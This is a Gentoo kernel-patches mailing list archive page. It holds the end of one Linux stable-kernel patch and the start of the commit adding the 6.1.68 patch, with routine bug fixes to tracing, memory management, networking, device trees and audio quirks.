++	 msb2 = rb_time_val_cnt(msb2, cnt);
+ 	 top2 = rb_time_val_cnt(top2, cnt2);
+ 	 bottom2 = rb_time_val_cnt(bottom2, cnt2);
+ 
+@@ -1801,6 +1805,8 @@ static void rb_free_cpu_buffer(struct ring_buffer_per_cpu *cpu_buffer)
+ 		free_buffer_page(bpage);
+ 	}
+ 
++	free_page((unsigned long)cpu_buffer->free_page);
++
+ 	kfree(cpu_buffer);
+ }
+ 
+@@ -2401,7 +2407,7 @@ rb_iter_head_event(struct ring_buffer_iter *iter)
+ 	 */
+ 	barrier();
+ 
+-	if ((iter->head + length) > commit || length > BUF_MAX_DATA_SIZE)
++	if ((iter->head + length) > commit || length > BUF_PAGE_SIZE)
+ 		/* Writer corrupted the read? */
+ 		goto reset;
+ 
+@@ -3576,7 +3582,10 @@ __rb_reserve_next(struct ring_buffer_per_cpu *cpu_buffer,
+ 		 * absolute timestamp.
+ 		 * Don't bother if this is the start of a new page (w == 0).
+ 		 */
+-		if (unlikely(!a_ok || !b_ok || (info->before != info->after && w))) {
++		if (!w) {
++			/* Use the sub-buffer timestamp */
++			info->delta = 0;
++		} else if (unlikely(!a_ok || !b_ok || info->before != info->after)) {
+ 			info->add_timestamp |= RB_ADD_STAMP_FORCE | RB_ADD_STAMP_EXTEND;
+ 			info->length += RB_LEN_TIME_EXTEND;
+ 		} else {
+@@ -3599,26 +3608,19 @@ __rb_reserve_next(struct ring_buffer_per_cpu *cpu_buffer,
+ 
+ 	/* See if we shot pass the end of this buffer page */
+ 	if (unlikely(write > BUF_PAGE_SIZE)) {
+-		/* before and after may now different, fix it up*/
+-		b_ok = rb_time_read(&cpu_buffer->before_stamp, &info->before);
+-		a_ok = rb_time_read(&cpu_buffer->write_stamp, &info->after);
+-		if (a_ok && b_ok && info->before != info->after)
+-			(void)rb_time_cmpxchg(&cpu_buffer->before_stamp,
+-					      info->before, info->after);
+-		if (a_ok && b_ok)
+-			check_buffer(cpu_buffer, info, CHECK_FULL_PAGE);
++		check_buffer(cpu_buffer, info, CHECK_FULL_PAGE);
+ 		return rb_move_tail(cpu_buffer, tail, info);
+ 	}
+ 
+ 	if (likely(tail == w)) {
+-		u64 save_before;
+-		bool s_ok;
+-
+ 		/* Nothing interrupted us between A and C */
+  /*D*/		rb_time_set(&cpu_buffer->write_stamp, info->ts);
+-		barrier();
+- /*E*/		s_ok = rb_time_read(&cpu_buffer->before_stamp, &save_before);
+-		RB_WARN_ON(cpu_buffer, !s_ok);
++		/*
++		 * If something came in between C and D, the write stamp
++		 * may now not be in sync. But that's fine as the before_stamp
++		 * will be different and then next event will just be forced
++		 * to use an absolute timestamp.
++		 */
+ 		if (likely(!(info->add_timestamp &
+ 			     (RB_ADD_STAMP_FORCE | RB_ADD_STAMP_ABSOLUTE))))
+ 			/* This did not interrupt any time update */
+@@ -3626,24 +3628,7 @@ __rb_reserve_next(struct ring_buffer_per_cpu *cpu_buffer,
+ 		else
+ 			/* Just use full timestamp for interrupting event */
+ 			info->delta = info->ts;
+-		barrier();
+ 		check_buffer(cpu_buffer, info, tail);
+-		if (unlikely(info->ts != save_before)) {
+-			/* SLOW PATH - Interrupted between C and E */
+-
+-			a_ok = rb_time_read(&cpu_buffer->write_stamp, &info->after);
+-			RB_WARN_ON(cpu_buffer, !a_ok);
+-
+-			/* Write stamp must only go forward */
+-			if (save_before > info->after) {
+-				/*
+-				 * We do not care about the result, only that
+-				 * it gets updated atomically.
+-				 */
+-				(void)rb_time_cmpxchg(&cpu_buffer->write_stamp,
+-						      info->after, save_before);
+-			}
+-		}
+ 	} else {
+ 		u64 ts;
+ 		/* SLOW PATH - Interrupted between A and C */
+@@ -3734,6 +3719,8 @@ rb_reserve_next_event(struct trace_buffer *buffer,
+ 	if (ring_buffer_time_stamp_abs(cpu_buffer->buffer)) {
+ 		add_ts_default = RB_ADD_STAMP_ABSOLUTE;
+ 		info.length += RB_LEN_TIME_EXTEND;
++		if (info.length > BUF_MAX_DATA_SIZE)
++			goto out_fail;
+ 	} else {
+ 		add_ts_default = RB_ADD_STAMP_NONE;
+ 	}
+@@ -5118,7 +5105,8 @@ ring_buffer_read_prepare(struct trace_buffer *buffer, int cpu, gfp_t flags)
+ 	if (!iter)
+ 		return NULL;
+ 
+-	iter->event = kmalloc(BUF_MAX_DATA_SIZE, flags);
++	/* Holds the entire event: data and meta data */
++	iter->event = kmalloc(BUF_PAGE_SIZE, flags);
+ 	if (!iter->event) {
+ 		kfree(iter);
+ 		return NULL;
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index d2db4d6f0f2fd..87eca95b57fb3 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -6268,7 +6268,7 @@ static int __tracing_resize_ring_buffer(struct trace_array *tr,
+ 	if (!tr->array_buffer.buffer)
+ 		return 0;
+ 
+-	/* Do not allow tracing while resizng ring buffer */
++	/* Do not allow tracing while resizing ring buffer */
+ 	tracing_stop_tr(tr);
+ 
+ 	ret = ring_buffer_resize(tr->array_buffer.buffer, size, cpu);
+@@ -6276,7 +6276,7 @@ static int __tracing_resize_ring_buffer(struct trace_array *tr,
+ 		goto out_start;
+ 
+ #ifdef CONFIG_TRACER_MAX_TRACE
+-	if (!tr->current_trace->use_max_tr)
++	if (!tr->allocated_snapshot)
+ 		goto out;
+ 
+ 	ret = ring_buffer_resize(tr->max_buffer.buffer, size, cpu);
+diff --git a/mm/shmem.c b/mm/shmem.c
+index 806741bbe4a68..f7c08e169e423 100644
+--- a/mm/shmem.c
++++ b/mm/shmem.c
+@@ -1024,7 +1024,24 @@ whole_folios:
+ 				}
+ 				VM_BUG_ON_FOLIO(folio_test_writeback(folio),
+ 						folio);
+-				truncate_inode_folio(mapping, folio);
++
++				if (!folio_test_large(folio)) {
++					truncate_inode_folio(mapping, folio);
++				} else if (truncate_inode_partial_folio(folio, lstart, lend)) {
++					/*
++					 * If we split a page, reset the loop so
++					 * that we pick up the new sub pages.
++					 * Otherwise the THP was entirely
++					 * dropped or the target range was
++					 * zeroed, so just continue the loop as
++					 * is.
++					 */
++					if (!folio_test_large(folio)) {
++						folio_unlock(folio);
++						index = start;
++						break;
++					}
++				}
+ 			}
+ 			index = folio->index + folio_nr_pages(folio) - 1;
+ 			folio_unlock(folio);
+diff --git a/mm/vmscan.c b/mm/vmscan.c
+index 93d6f27dd40b4..3f090faa6377f 100644
+--- a/mm/vmscan.c
++++ b/mm/vmscan.c
+@@ -4770,7 +4770,7 @@ static bool sort_folio(struct lruvec *lruvec, struct folio *folio, struct scan_c
+ 	}
+ 
+ 	/* protected */
+-	if (tier > tier_idx) {
++	if (tier > tier_idx || refs == BIT(LRU_REFS_WIDTH)) {
+ 		int hist = lru_hist_from_seq(lrugen->min_seq[type]);
+ 
+ 		gen = folio_inc_gen(lruvec, folio, false);
+diff --git a/mm/workingset.c b/mm/workingset.c
+index ae7e984b23c6b..6e4699055ed37 100644
+--- a/mm/workingset.c
++++ b/mm/workingset.c
+@@ -289,10 +289,10 @@ static void lru_gen_refault(struct folio *folio, void *shadow)
+ 	 * 1. For pages accessed through page tables, hotter pages pushed out
+ 	 *    hot pages which refaulted immediately.
+ 	 * 2. For pages accessed multiple times through file descriptors,
+-	 *    numbers of accesses might have been out of the range.
++	 *    they would have been protected by sort_folio().
+ 	 */
+-	if (lru_gen_in_fault() || refs == BIT(LRU_REFS_WIDTH)) {
+-		folio_set_workingset(folio);
++	if (lru_gen_in_fault() || refs >= BIT(LRU_REFS_WIDTH) - 1) {
++		set_mask_bits(&folio->flags, 0, LRU_REFS_MASK | BIT(PG_workingset));
+ 		mod_lruvec_state(lruvec, WORKINGSET_RESTORE_BASE + type, delta);
+ 	}
+ unlock:
+diff --git a/net/appletalk/ddp.c b/net/appletalk/ddp.c
+index a06f4d4a6f476..f67f14db16334 100644
+--- a/net/appletalk/ddp.c
++++ b/net/appletalk/ddp.c
+@@ -1811,15 +1811,14 @@ static int atalk_ioctl(struct socket *sock, unsigned int cmd, unsigned long arg)
+ 		break;
+ 	}
+ 	case TIOCINQ: {
+-		/*
+-		 * These two are safe on a single CPU system as only
+-		 * user tasks fiddle here
+-		 */
+-		struct sk_buff *skb = skb_peek(&sk->sk_receive_queue);
++		struct sk_buff *skb;
+ 		long amount = 0;
+ 
++		spin_lock_irq(&sk->sk_receive_queue.lock);
++		skb = skb_peek(&sk->sk_receive_queue);
+ 		if (skb)
+ 			amount = skb->len - sizeof(struct ddpehdr);
++		spin_unlock_irq(&sk->sk_receive_queue.lock);
+ 		rc = put_user(amount, (int __user *)argp);
+ 		break;
+ 	}
+diff --git a/net/atm/ioctl.c b/net/atm/ioctl.c
+index 838ebf0cabbfb..f81f8d56f5c0c 100644
+--- a/net/atm/ioctl.c
++++ b/net/atm/ioctl.c
+@@ -73,14 +73,17 @@ static int do_vcc_ioctl(struct socket *sock, unsigned int cmd,
+ 	case SIOCINQ:
+ 	{
+ 		struct sk_buff *skb;
++		int amount;
+ 
+ 		if (sock->state != SS_CONNECTED) {
+ 			error = -EINVAL;
+ 			goto done;
+ 		}
++		spin_lock_irq(&sk->sk_receive_queue.lock);
+ 		skb = skb_peek(&sk->sk_receive_queue);
+-		error = put_user(skb ? skb->len : 0,
+-				 (int __user *)argp) ? -EFAULT : 0;
++		amount = skb ? skb->len : 0;
++		spin_unlock_irq(&sk->sk_receive_queue.lock);
++		error = put_user(amount, (int __user *)argp) ? -EFAULT : 0;
+ 		goto done;
+ 	}
+ 	case ATM_SETSC:
+diff --git a/net/batman-adv/soft-interface.c b/net/batman-adv/soft-interface.c
+index 38d411a52f331..d7b525a495e45 100644
+--- a/net/batman-adv/soft-interface.c
++++ b/net/batman-adv/soft-interface.c
+@@ -444,7 +444,7 @@ void batadv_interface_rx(struct net_device *soft_iface,
+ 		if (!pskb_may_pull(skb, VLAN_ETH_HLEN))
+ 			goto dropped;
+ 
+-		vhdr = (struct vlan_ethhdr *)skb->data;
++		vhdr = skb_vlan_eth_hdr(skb);
+ 
+ 		/* drop batman-in-batman packets to prevent loops */
+ 		if (vhdr->h_vlan_encapsulated_proto != htons(ETH_P_BATMAN))
+diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
+index 5b93d1ed1ed19..67087da45a1f7 100644
+--- a/net/ipv4/tcp_output.c
++++ b/net/ipv4/tcp_output.c
+@@ -3210,7 +3210,13 @@ int __tcp_retransmit_skb(struct sock *sk, struct sk_buff *skb, int segs)
+ 	if (skb_still_in_host_queue(sk, skb))
+ 		return -EBUSY;
+ 
++start:
+ 	if (before(TCP_SKB_CB(skb)->seq, tp->snd_una)) {
++		if (unlikely(TCP_SKB_CB(skb)->tcp_flags & TCPHDR_SYN)) {
++			TCP_SKB_CB(skb)->tcp_flags &= ~TCPHDR_SYN;
++			TCP_SKB_CB(skb)->seq++;
++			goto start;
++		}
+ 		if (unlikely(before(TCP_SKB_CB(skb)->end_seq, tp->snd_una))) {
+ 			WARN_ON_ONCE(1);
+ 			return -EINVAL;
+diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
+index c63ccd39fc552..b8dc20fe7a4e2 100644
+--- a/net/ipv6/addrconf.c
++++ b/net/ipv6/addrconf.c
+@@ -6105,11 +6105,7 @@ static int inet6_fill_prefix(struct sk_buff *skb, struct inet6_dev *idev,
+ 	pmsg->prefix_len = pinfo->prefix_len;
+ 	pmsg->prefix_type = pinfo->type;
+ 	pmsg->prefix_pad3 = 0;
+-	pmsg->prefix_flags = 0;
+-	if (pinfo->onlink)
+-		pmsg->prefix_flags |= IF_PREFIX_ONLINK;
+-	if (pinfo->autoconf)
+-		pmsg->prefix_flags |= IF_PREFIX_AUTOCONF;
++	pmsg->prefix_flags = pinfo->flags;
+ 
+ 	if (nla_put(skb, PREFIX_ADDRESS, sizeof(pinfo->prefix), &pinfo->prefix))
+ 		goto nla_put_failure;
+diff --git a/net/rose/af_rose.c b/net/rose/af_rose.c
+index ca2b17f32670d..674937284b8d2 100644
+--- a/net/rose/af_rose.c
++++ b/net/rose/af_rose.c
+@@ -1315,9 +1315,11 @@ static int rose_ioctl(struct socket *sock, unsigned int cmd, unsigned long arg)
+ 	case TIOCINQ: {
+ 		struct sk_buff *skb;
+ 		long amount = 0L;
+-		/* These two are safe on a single CPU system as only user tasks fiddle here */
++
++		spin_lock_irq(&sk->sk_receive_queue.lock);
+ 		if ((skb = skb_peek(&sk->sk_receive_queue)) != NULL)
+ 			amount = skb->len;
++		spin_unlock_irq(&sk->sk_receive_queue.lock);
+ 		return put_user(amount, (unsigned int __user *) argp);
+ 	}
+ 
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index 2e60bf06adff0..0323040d34bc6 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -1225,6 +1225,8 @@ alloc_payload:
+ 		}
+ 
+ 		sk_msg_page_add(msg_pl, page, copy, offset);
++		msg_pl->sg.copybreak = 0;
++		msg_pl->sg.curr = msg_pl->sg.end;
+ 		sk_mem_charge(sk, copy);
+ 
+ 		offset += copy;
+diff --git a/net/vmw_vsock/virtio_transport_common.c b/net/vmw_vsock/virtio_transport_common.c
+index 79e79fd6efd19..2e25890ca52d1 100644
+--- a/net/vmw_vsock/virtio_transport_common.c
++++ b/net/vmw_vsock/virtio_transport_common.c
+@@ -583,7 +583,7 @@ static s64 virtio_transport_has_space(struct vsock_sock *vsk)
+ 	struct virtio_vsock_sock *vvs = vsk->trans;
+ 	s64 bytes;
+ 
+-	bytes = vvs->peer_buf_alloc - (vvs->tx_cnt - vvs->peer_fwd_cnt);
++	bytes = (s64)vvs->peer_buf_alloc - (vvs->tx_cnt - vvs->peer_fwd_cnt);
+ 	if (bytes < 0)
+ 		bytes = 0;
+ 
+diff --git a/scripts/sign-file.c b/scripts/sign-file.c
+index 598ef5465f825..3edb156ae52c3 100644
+--- a/scripts/sign-file.c
++++ b/scripts/sign-file.c
+@@ -322,7 +322,7 @@ int main(int argc, char **argv)
+ 				     CMS_NOSMIMECAP | use_keyid |
+ 				     use_signed_attrs),
+ 		    "CMS_add1_signer");
+-		ERR(CMS_final(cms, bm, NULL, CMS_NOCERTS | CMS_BINARY) < 0,
++		ERR(CMS_final(cms, bm, NULL, CMS_NOCERTS | CMS_BINARY) != 1,
+ 		    "CMS_final");
+ 
+ #else
+@@ -341,10 +341,10 @@ int main(int argc, char **argv)
+ 			b = BIO_new_file(sig_file_name, "wb");
+ 			ERR(!b, "%s", sig_file_name);
+ #ifndef USE_PKCS7
+-			ERR(i2d_CMS_bio_stream(b, cms, NULL, 0) < 0,
++			ERR(i2d_CMS_bio_stream(b, cms, NULL, 0) != 1,
+ 			    "%s", sig_file_name);
+ #else
+-			ERR(i2d_PKCS7_bio(b, pkcs7) < 0,
++			ERR(i2d_PKCS7_bio(b, pkcs7) != 1,
+ 			    "%s", sig_file_name);
+ #endif
+ 			BIO_free(b);
+@@ -374,9 +374,9 @@ int main(int argc, char **argv)
+ 
+ 	if (!raw_sig) {
+ #ifndef USE_PKCS7
+-		ERR(i2d_CMS_bio_stream(bd, cms, NULL, 0) < 0, "%s", dest_name);
++		ERR(i2d_CMS_bio_stream(bd, cms, NULL, 0) != 1, "%s", dest_name);
+ #else
+-		ERR(i2d_PKCS7_bio(bd, pkcs7) < 0, "%s", dest_name);
++		ERR(i2d_PKCS7_bio(bd, pkcs7) != 1, "%s", dest_name);
+ #endif
+ 	} else {
+ 		BIO *b;
+@@ -396,7 +396,7 @@ int main(int argc, char **argv)
+ 	ERR(BIO_write(bd, &sig_info, sizeof(sig_info)) < 0, "%s", dest_name);
+ 	ERR(BIO_write(bd, magic_number, sizeof(magic_number) - 1) < 0, "%s", dest_name);
+ 
+-	ERR(BIO_free(bd) < 0, "%s", dest_name);
++	ERR(BIO_free(bd) != 1, "%s", dest_name);
+ 
+ 	/* Finally, if we're signing in place, replace the original. */
+ 	if (replace_orig)
+diff --git a/sound/pci/hda/patch_hdmi.c b/sound/pci/hda/patch_hdmi.c
+index 7b5e09070ab9b..f460ac80c8e49 100644
+--- a/sound/pci/hda/patch_hdmi.c
++++ b/sound/pci/hda/patch_hdmi.c
+@@ -1993,7 +1993,10 @@ static const struct snd_pci_quirk force_connect_list[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x871a, "HP", 1),
+ 	SND_PCI_QUIRK(0x103c, 0x8711, "HP", 1),
+ 	SND_PCI_QUIRK(0x103c, 0x8715, "HP", 1),
++	SND_PCI_QUIRK(0x1043, 0x86ae, "ASUS", 1),  /* Z170 PRO */
++	SND_PCI_QUIRK(0x1043, 0x86c7, "ASUS", 1),  /* Z170M PLUS */
+ 	SND_PCI_QUIRK(0x1462, 0xec94, "MS-7C94", 1),
++	SND_PCI_QUIRK(0x8086, 0x2060, "Intel NUC5CPYB", 1),
+ 	SND_PCI_QUIRK(0x8086, 0x2081, "Intel NUC 10", 1),
+ 	{}
+ };
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index c6cae3369a6a1..a7c361e0daebe 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9577,6 +9577,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x83b9, "HP Spectre x360", ALC269_FIXUP_HP_MUTE_LED_MIC3),
+ 	SND_PCI_QUIRK(0x103c, 0x841c, "HP Pavilion 15-CK0xx", ALC269_FIXUP_HP_MUTE_LED_MIC3),
+ 	SND_PCI_QUIRK(0x103c, 0x8497, "HP Envy x360", ALC269_FIXUP_HP_MUTE_LED_MIC3),
++	SND_PCI_QUIRK(0x103c, 0x84ae, "HP 15-db0403ng", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x84da, "HP OMEN dc0019-ur", ALC295_FIXUP_HP_OMEN),
+ 	SND_PCI_QUIRK(0x103c, 0x84e7, "HP Pavilion 15", ALC269_FIXUP_HP_MUTE_LED_MIC3),
+ 	SND_PCI_QUIRK(0x103c, 0x8519, "HP Spectre x360 15-df0xxx", ALC285_FIXUP_HP_SPECTRE_X360),
+diff --git a/tools/testing/selftests/bpf/progs/bpf_loop_bench.c b/tools/testing/selftests/bpf/progs/bpf_loop_bench.c
+index 4ce76eb064c41..d461746fd3c1e 100644
+--- a/tools/testing/selftests/bpf/progs/bpf_loop_bench.c
++++ b/tools/testing/selftests/bpf/progs/bpf_loop_bench.c
+@@ -15,13 +15,16 @@ static int empty_callback(__u32 index, void *data)
+ 	return 0;
+ }
+ 
++static int outer_loop(__u32 index, void *data)
++{
++	bpf_loop(nr_loops, empty_callback, NULL, 0);
++	__sync_add_and_fetch(&hits, nr_loops);
++	return 0;
++}
++
+ SEC("fentry/" SYS_PREFIX "sys_getpgid")
+ int benchmark(void *ctx)
+ {
+-	for (int i = 0; i < 1000; i++) {
+-		bpf_loop(nr_loops, empty_callback, NULL, 0);
+-
+-		__sync_add_and_fetch(&hits, nr_loops);
+-	}
++	bpf_loop(1000, outer_loop, NULL, 0);
+ 	return 0;
+ }


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-12-13 18:27 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-12-13 18:27 UTC (permalink / raw
  To: gentoo-commits

commit:     1b001ef904a50ea1a63ca48ab21fb6ecd6d3d362
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Dec 13 18:27:06 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Dec 13 18:27:06 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=1b001ef9

Linux patch 6.1.68

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1067_linux-6.1.68.patch | 9166 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 9170 insertions(+)

diff --git a/0000_README b/0000_README
index 5f228fc4..a8206ed1 100644
--- a/0000_README
+++ b/0000_README
@@ -311,6 +311,10 @@ Patch:  1066_linux-6.1.67.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.67
 
+Patch:  1067_linux-6.1.68.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.68
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1067_linux-6.1.68.patch b/1067_linux-6.1.68.patch
new file mode 100644
index 00000000..78edec28
--- /dev/null
+++ b/1067_linux-6.1.68.patch
@@ -0,0 +1,9166 @@
+diff --git a/Documentation/ABI/testing/sysfs-bus-optee-devices b/Documentation/ABI/testing/sysfs-bus-optee-devices
+index 0f58701367b66..af31e5a22d89f 100644
+--- a/Documentation/ABI/testing/sysfs-bus-optee-devices
++++ b/Documentation/ABI/testing/sysfs-bus-optee-devices
+@@ -6,3 +6,12 @@ Description:
+ 		OP-TEE bus provides reference to registered drivers under this directory. The <uuid>
+ 		matches Trusted Application (TA) driver and corresponding TA in secure OS. Drivers
+ 		are free to create needed API under optee-ta-<uuid> directory.
++
++What:		/sys/bus/tee/devices/optee-ta-<uuid>/need_supplicant
++Date:		November 2023
++KernelVersion:	6.7
++Contact:	op-tee@lists.trustedfirmware.org
++Description:
++		Allows to distinguish whether an OP-TEE based TA/device requires user-space
++		tee-supplicant to function properly or not. This attribute will be present for
++		devices which depend on tee-supplicant to be running.
+diff --git a/Documentation/devicetree/bindings/interrupt-controller/qcom,mpm.yaml b/Documentation/devicetree/bindings/interrupt-controller/qcom,mpm.yaml
+index 509d20c091af8..6a206111d4e0f 100644
+--- a/Documentation/devicetree/bindings/interrupt-controller/qcom,mpm.yaml
++++ b/Documentation/devicetree/bindings/interrupt-controller/qcom,mpm.yaml
+@@ -62,6 +62,9 @@ properties:
+         - description: MPM pin number
+         - description: GIC SPI number for the MPM pin
+ 
++  '#power-domain-cells':
++    const: 0
++
+ required:
+   - compatible
+   - reg
+@@ -93,4 +96,5 @@ examples:
+                            <86 183>,
+                            <90 260>,
+                            <91 260>;
++        #power-domain-cells = <0>;
+     };
+diff --git a/Makefile b/Makefile
+index c27600b90cad2..2a8ad0cec2f1c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 67
++SUBLEVEL = 68
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/imx28-xea.dts b/arch/arm/boot/dts/imx28-xea.dts
+index a400c108f66a2..6c5e6856648af 100644
+--- a/arch/arm/boot/dts/imx28-xea.dts
++++ b/arch/arm/boot/dts/imx28-xea.dts
+@@ -8,6 +8,7 @@
+ #include "imx28-lwe.dtsi"
+ 
+ / {
++	model = "Liebherr XEA board";
+ 	compatible = "lwn,imx28-xea", "fsl,imx28";
+ };
+ 
+diff --git a/arch/arm/boot/dts/imx6ul-pico.dtsi b/arch/arm/boot/dts/imx6ul-pico.dtsi
+index 357ffb2f5ad61..dd6790852b0d6 100644
+--- a/arch/arm/boot/dts/imx6ul-pico.dtsi
++++ b/arch/arm/boot/dts/imx6ul-pico.dtsi
+@@ -121,6 +121,8 @@
+ 			max-speed = <100>;
+ 			interrupt-parent = <&gpio5>;
+ 			interrupts = <6 IRQ_TYPE_LEVEL_LOW>;
++			clocks = <&clks IMX6UL_CLK_ENET_REF>;
++			clock-names = "rmii-ref";
+ 		};
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/imx7s.dtsi b/arch/arm/boot/dts/imx7s.dtsi
+index 667568aa4326a..45947707134b8 100644
+--- a/arch/arm/boot/dts/imx7s.dtsi
++++ b/arch/arm/boot/dts/imx7s.dtsi
+@@ -454,7 +454,7 @@
+ 			};
+ 
+ 			gpt1: timer@302d0000 {
+-				compatible = "fsl,imx7d-gpt", "fsl,imx6sx-gpt";
++				compatible = "fsl,imx7d-gpt", "fsl,imx6dl-gpt";
+ 				reg = <0x302d0000 0x10000>;
+ 				interrupts = <GIC_SPI 55 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clks IMX7D_GPT1_ROOT_CLK>,
+@@ -463,7 +463,7 @@
+ 			};
+ 
+ 			gpt2: timer@302e0000 {
+-				compatible = "fsl,imx7d-gpt", "fsl,imx6sx-gpt";
++				compatible = "fsl,imx7d-gpt", "fsl,imx6dl-gpt";
+ 				reg = <0x302e0000 0x10000>;
+ 				interrupts = <GIC_SPI 54 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clks IMX7D_GPT2_ROOT_CLK>,
+@@ -473,7 +473,7 @@
+ 			};
+ 
+ 			gpt3: timer@302f0000 {
+-				compatible = "fsl,imx7d-gpt", "fsl,imx6sx-gpt";
++				compatible = "fsl,imx7d-gpt", "fsl,imx6dl-gpt";
+ 				reg = <0x302f0000 0x10000>;
+ 				interrupts = <GIC_SPI 53 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clks IMX7D_GPT3_ROOT_CLK>,
+@@ -483,7 +483,7 @@
+ 			};
+ 
+ 			gpt4: timer@30300000 {
+-				compatible = "fsl,imx7d-gpt", "fsl,imx6sx-gpt";
++				compatible = "fsl,imx7d-gpt", "fsl,imx6dl-gpt";
+ 				reg = <0x30300000 0x10000>;
+ 				interrupts = <GIC_SPI 52 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clks IMX7D_GPT4_ROOT_CLK>,
+diff --git a/arch/arm/mach-imx/mmdc.c b/arch/arm/mach-imx/mmdc.c
+index b9efe9da06e0b..3d76e8c28c51d 100644
+--- a/arch/arm/mach-imx/mmdc.c
++++ b/arch/arm/mach-imx/mmdc.c
+@@ -502,6 +502,10 @@ static int imx_mmdc_perf_init(struct platform_device *pdev, void __iomem *mmdc_b
+ 
+ 	name = devm_kasprintf(&pdev->dev,
+ 				GFP_KERNEL, "mmdc%d", ret);
++	if (!name) {
++		ret = -ENOMEM;
++		goto pmu_release_id;
++	}
+ 
+ 	pmu_mmdc->mmdc_ipg_clk = mmdc_ipg_clk;
+ 	pmu_mmdc->devtype_data = (struct fsl_mmdc_devtype_data *)of_id->data;
+@@ -524,9 +528,10 @@ static int imx_mmdc_perf_init(struct platform_device *pdev, void __iomem *mmdc_b
+ 
+ pmu_register_err:
+ 	pr_warn("MMDC Perf PMU failed (%d), disabled\n", ret);
+-	ida_simple_remove(&mmdc_ida, pmu_mmdc->id);
+ 	cpuhp_state_remove_instance_nocalls(cpuhp_mmdc_state, &pmu_mmdc->node);
+ 	hrtimer_cancel(&pmu_mmdc->hrtimer);
++pmu_release_id:
++	ida_simple_remove(&mmdc_ida, pmu_mmdc->id);
+ pmu_free:
+ 	kfree(pmu_mmdc);
+ 	return ret;
+diff --git a/arch/arm64/boot/dts/freescale/imx8mp.dtsi b/arch/arm64/boot/dts/freescale/imx8mp.dtsi
+index 25630a395db56..8c34b3e12a66a 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mp.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mp.dtsi
+@@ -1301,6 +1301,7 @@
+ 				phys = <&usb3_phy0>, <&usb3_phy0>;
+ 				phy-names = "usb2-phy", "usb3-phy";
+ 				snps,gfladj-refclk-lpm-sel-quirk;
++				snps,parkmode-disable-ss-quirk;
+ 			};
+ 
+ 		};
+@@ -1343,6 +1344,7 @@
+ 				phys = <&usb3_phy1>, <&usb3_phy1>;
+ 				phy-names = "usb2-phy", "usb3-phy";
+ 				snps,gfladj-refclk-lpm-sel-quirk;
++				snps,parkmode-disable-ss-quirk;
+ 			};
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mq.dtsi b/arch/arm64/boot/dts/freescale/imx8mq.dtsi
+index bf8f02c1535c1..e642cb7d54d77 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mq.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mq.dtsi
+@@ -1431,7 +1431,7 @@
+ 			phys = <&usb3_phy0>, <&usb3_phy0>;
+ 			phy-names = "usb2-phy", "usb3-phy";
+ 			power-domains = <&pgc_otg1>;
+-			usb3-resume-missing-cas;
++			snps,parkmode-disable-ss-quirk;
+ 			status = "disabled";
+ 		};
+ 
+@@ -1463,7 +1463,7 @@
+ 			phys = <&usb3_phy1>, <&usb3_phy1>;
+ 			phy-names = "usb2-phy", "usb3-phy";
+ 			power-domains = <&pgc_otg2>;
+-			usb3-resume-missing-cas;
++			snps,parkmode-disable-ss-quirk;
+ 			status = "disabled";
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/mediatek/mt7622-bananapi-bpi-r64.dts b/arch/arm64/boot/dts/mediatek/mt7622-bananapi-bpi-r64.dts
+index d3f9eab2b7844..2c35ed0734a47 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7622-bananapi-bpi-r64.dts
++++ b/arch/arm64/boot/dts/mediatek/mt7622-bananapi-bpi-r64.dts
+@@ -72,7 +72,7 @@
+ 		};
+ 	};
+ 
+-	memory {
++	memory@40000000 {
+ 		reg = <0 0x40000000 0 0x40000000>;
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/mediatek/mt7622-rfb1.dts b/arch/arm64/boot/dts/mediatek/mt7622-rfb1.dts
+index 36722cabe626e..f9313b697ac12 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7622-rfb1.dts
++++ b/arch/arm64/boot/dts/mediatek/mt7622-rfb1.dts
